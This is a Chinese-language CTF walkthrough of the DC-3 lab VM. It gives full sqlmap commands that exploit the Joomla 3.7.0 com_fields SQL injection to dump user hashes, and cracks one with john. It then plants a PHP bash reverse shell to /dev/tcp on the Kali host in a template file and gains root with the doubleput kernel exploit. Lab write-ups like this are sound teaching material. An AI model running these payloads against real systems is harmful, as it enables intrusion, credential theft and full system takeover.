kali渗透之DC-3

准备kali（192.168.61.132）和DC-3（未知）

kali与DC-3都使用NAT连接

DC-3靶机 下载地址：

链接：https://pan.baidu.com/s/1LAjfwFfYYuvcJERaSh7MQw?pwd=ew4x
提取码：ew4x

第一步使用nmap扫描同段主机，判断DC-3的IP地址

发现主机192.168.61.135，用网页访问，并查看框架发现是Joomla系列

 我们可以使用joomscan扫描工具

Joomla!网站扫描工具joomscan

Joomla!是一款知名的PHP语言编写的CMS系统。很多网站都使用Joomla!搭建而成。Kali Linux集成了一款Joomla!网站扫描工具joomscan。该工具不仅可以对网站所使用的Joomla!版本、防火墙进行探测，还可以探测已知的漏洞，并生成文本或网页形式的报告。在使用之前，用户应该先使用自带的check和update命令升级该工具，以获取最新的扫描工具和漏洞数据库。

下载joomscan命令

apt install joomscan

 下载完成后打开joomscan扫描工具，然后进行对网站的扫描

joomscan -u http://192.168.61.135

我们可以看到DC3的joomla的版本号以及管理员地址

 用浏览器进入到管理员地址，再使用以下命令对joomla版本的扫描

searchsploit joomla 3.7.0

发现了一个SQL注入漏洞

然后使用命令查看文本的路径

searchsploit -p 42033

扫描出文本路径为

/usr/share/exploitdb/exploits/php/webapps/42033.txt

打开这个文件查看，可以看到一些漏洞的信息，测试过的环境，以及漏洞的地址

 http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

最重要的还有一个sqlmap的利用的一个命令

sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

 接着直接使用sqlmap的地址将localhost改为DC-3 的地址直接回车即可

 扫描出数据库

我们直接使用joomladb的数据库，扫描出joomladb数据库的表

sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

 扫描出有个__users的表名

 接着扫描__users表中的字段

sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

选择线程数 1 就可以

检索出了username和 password

 接着直接爆破他的账号密码

sqlmap -u "http://192.168.61.135/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username.password -dump

最后账号密码被爆破出来，但是密码被加密过了，需要自己破解

我们先将爆破出来的密码复制，新建一个文档写入，然后使用john命令进行破解

john 11.txt -show（新建的文件名）

 爆破出来密码为 snoopy

我们使用dirsearch命令扫描

dirsearch -u http://192.168.61.135/ -e * -i 200

dirsearch是一个基于python的命令行工具,旨在暴力扫描页面结构,包括网页中的目录和文件。

可以看到有一个README.txt的文本和后台管理员的一个地址

然后我们先进行后台管理员登录

登录之后先拿到操作权限，提权，寻找可以上传后门木马的地方，写入一句话木马，最终选择创建一个新的shell.php文件 并写入一句话，保存

在管理员登录页面，点击Templates -- Templates

 根据页面提示进入，然后选择index.php，在文件上方插入exec反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.61.132/1234 0>&1'"); ?>
这里的IP地址是kali的IP地址

与此同时在kali中进行nc监听1234端口

nc -lvvp 1234

监听完然后保存exec木马，在左上方出现  Editing file "/index.php" in template "beez3".的路径

 我们访问这个路径 即：192.168.61.135/templates/beez3/index.php 这个页面一直再转圈圈出不来

然后kali就会反弹shell成功

使用 uname -a查看当前靶机的内核版本

然后使用kali的searchspolit查找Ubuntu 16.04的内核提权漏洞

searchsploit Ubuntu 16.04 | grep  'Privilege Escalation'
或者
searchsploit Linux kernel 4.4x | grep  'Privilege Escalation'

Privilege Escalation：提升权限

 使用searchsploit -m 命令将 39772这个文件复制到当前路径

 查看39772的文件发现底部有一个github网址下载链接，将这个压缩包下载

因为这个是外网的文件，我们在windows系统下载，使用phpstudy将文件放到kali

将下载好的文件放到phpstudy的www的目录下

 使用wget命令将这个文件下载到kali中

wget http://192.168.43.117:80/39772.zip
IP地址为物理机的IP地址，端口号为phpstudy开启的端口号

 然后使用解压 unzip命令，将文件解压

unzip  39772.zip

 解压完之后进入到这个目录，发现两个压缩包，使用tar解压 exploit压缩包

 

 解压完，查看发现多了一个目录：ebpf_mapfd_doubleput_exploit，进入这个目录查看

 进入之后查看有三个文件

然后编译：./compile.sh
运行：./doubleput

 之后我们就进入了root权限，cd  /root查看，拿到最终的权限

 DC-3靶机完结！撒花*★,°*:.☆(￣▽￣)/$:*.°★*.